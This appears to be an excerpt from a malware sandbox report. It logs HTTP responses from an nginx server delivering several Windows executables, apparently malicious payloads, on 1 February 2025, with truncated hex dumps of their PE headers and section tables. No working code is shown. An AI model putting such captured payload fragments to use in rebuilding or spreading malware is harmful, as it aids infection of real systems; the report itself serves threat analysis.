00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:57:14 GMTContent-Type: application/octet-streamContent-Length: 3028480Last-Modified: Sat, 01 Feb 2025 15:09:26 GMTConnection: keep-aliveETag: "679e3926-2e3600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 e0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 32 00 00 04 00 00 3c 8a 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 a8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 c8 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 c7 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 a8 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 77 72 6f 74 77 75 77 00 20 2b 00 00 b0 06 00 00 1c 2b 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 79 69 61 6d 62 6d 78 00 10 00 00 00 d0 31 00 00 04 00 00 00 10 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 31 00 00 22 00 00 00 14 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:58:08 GMTContent-Type: application/octet-streamContent-Length: 542720Last-Modified: Wed, 29 Jan 2025 18:49:23 GMTConnection: keep-aliveETag: "679a7833-84800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 f4 f2 ec e5 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 24 03 00 00 08 00 00 00 00 00 00 ce 43 03 00 00 20 00 00 00 60 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 08 00 00 04 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 80 43 03 00 4b 00 00 00 00 60 03 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 03 00 0c 00 00 00 3d 43 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 23 03 00 00 20 00 00 00 24 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 60 03 00 00 06 00 00 00 28 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 03 00 00 02 00 00 00 2e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 64 61 74 61 00 00 00 18 05 00 00 a0 03 00 00 18 05 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:58:12 GMTContent-Type: application/octet-streamContent-Length: 1013457Last-Modified: Tue, 28 Jan 2025 06:49:56 GMTConnection: keep-aliveETag: "67987e14-f76d1"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 62 7c 80 4e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7a 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 70 10 00 00 04 00 00 f5 d7 0f 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 c6 5e 00 00 00 00 00 00 00 00 00 00 69 4e 0f 00 68 28 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 c6 5e 00 00 00 00 10 00 00 60 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 60 10 00 00 10 00 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:58:17 GMTContent-Type: application/octet-streamContent-Length: 1890304Last-Modified: Sat, 01 Feb 2025 15:20:01 GMTConnection: keep-aliveETag: "679e3ba1-1cd800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 cb 85 81 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 28 04 00 00 ba 00 00 00 00 00 00 00 b0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 4a 00 00 04 00 00 3e a5 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 50 05 00 6b 00 00 00 00 40 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 51 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 30 05 00 00 10 00 00 00 7a 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 40 05 00 00 02 00 00 00 8a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 50 05 00 00 02 00 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2b 00 00 60 05 00 00 02 00 00 00 8e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 78 6c 6d 6a 74 6a 69 00 30 1a 00 00 70 30 00 00 22 1a 00 00 90 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6a 65 77 66 6e 68 6b 00 10 00 00 00 a0 4a 00 00 04 00 00 00 b2 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 4a 00 00 22 00 00 00 b6 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:58:23 GMTContent-Type: application/octet-streamContent-Length: 1501214Last-Modified: Fri, 24 Jan 2025 15:07:02 GMTConnection: keep-aliveETag: "6793ac96-16e81e"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 bd ea e2 3a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 50 01 00 00 24 01 00 00 00 00 00 78 64 01 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 20 03 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 9e 0f 00 00 00 10 02 00 d4 02 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 e3 01 00 4c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 43 01 00 00 10 00 00 00 44 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 e8 0b 00 00 00 60 01 00 00 0c 00 00 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 9c 0d 00 00 00 70 01 00 00 0e 00 00 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 4c 57 00 00 00 80 01 00 00 00 00 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9e 0f 00 00 00 e0 01 00 00 10 00 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 f0 01 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 00 02 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 d4 02 01 00 00 10 02 00 00 04 01 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 02 00 00 00 00 00 00 26 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:58:29 GMTContent-Type: application/octet-streamContent-Length: 866906Last-Modified: Fri, 24 Jan 2025 12:37:12 GMTConnection: keep-aliveETag: "67938978-d3a5a"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 62 7c 80 4e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7e 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 00 11 00 00 04 00 00 e2 fd 0d 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 6a ed 00 00 00 00 00 00 00 00 00 00 e2 10 0d 00 78 29 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 6a ed 00 00 00 00 10 00 00 ee 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 f0 10 00 00 10 00 00 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:58:34 GMTContent-Type: application/octet-streamContent-Length: 10584064Last-Modified: Sat, 01 Feb 2025 09:45:44 GMTConnection: keep-aliveETag: "679ded48-a18000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7d 82 ee b9 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 e0 a0 00 00 9e 00 00 00 00 00 00 f2 fd a0 00 00 20 00 00 00 00 a1 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 a1 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 fd a0 00 4f 00 00 00 00 00 a1 00 64 9b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 a1 00 0c 00 00 00 84 fd a0 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 de a0 00 00 20 00 00 00 e0 a0 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 64 9b 00 00 00 00 a1 00 00 9c 00 00 00 e2 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 a1 00 00 02 00 00 00 7e a1 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 fd a0 00 00 00 00 00 48 00 00 00 02 00 05 00 8c 27 00 00 00 3d 00 00 03 00 02 00 25 00 00 06 8c 64 00 00 f8 98 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 72 01 00 00 70 28 13 00 00 0a 2a a6 17 8d 2a 00 00 01 25 16 20 dd 3a 17 59 9e 80 01 00 00 04 7f 02 00 00 04 fe 15 01 00 00 1b 73 14 00 00 0a 80 03 00 00 04 2a 2e 72 35 00 00 70 28 15 00 00 0a 2a b2 19 8d 2c 00 00 01 25 d0 3a 00 00 04 28 16 00 00 0a 80 04 00 00 04 7f 05 00 00 04 fe 15 02 00 00 1b 73 14 00 00 0a 80 06 00 00 04 2a 2e 72 4f 00 00 70 28 15 00 00 0a 2a 2e 72 7f 00 00 70 28 17 00 00 0a 2a 2e 72 ad 00 00 70 28 13 00 00 0a 2a 2e 72 d3 00 00 70 28 17 00 00 0a 2a 06 2a 06 2a 6e 02 17 8d 2a 00 00 01 25 16 20 16 80 c9 30 9e 7d 07 00 00 04 02 28 18 00 00 0a 2a 2e 72 eb 00 00 70 28 19 00 00 0a 2a a6 02 19 8d 2c 00 00 01 25 d0 36 00 00 04 28 16 00 00 0a 7d 09 00 00 04 02 73 14 00 00 0a 7d 0b 00 00 04 02 28 18 00 00 0a 2a 2e 72 05 01 00 70 28 1a 00 00 0a 2a 2e 72 3d 01 00 70 28 1b 00 00 0a 2a 00 00 00 1b 30 04 00 7b 00 00 00 01 00 00 11 73 1c 00 00 0a 0a 73 1d 00 00 0a 0b 07 28 1e 00 00 0a 03 6f 1f 00 00 0a 6f 20 00 00 0a 0c 06 0
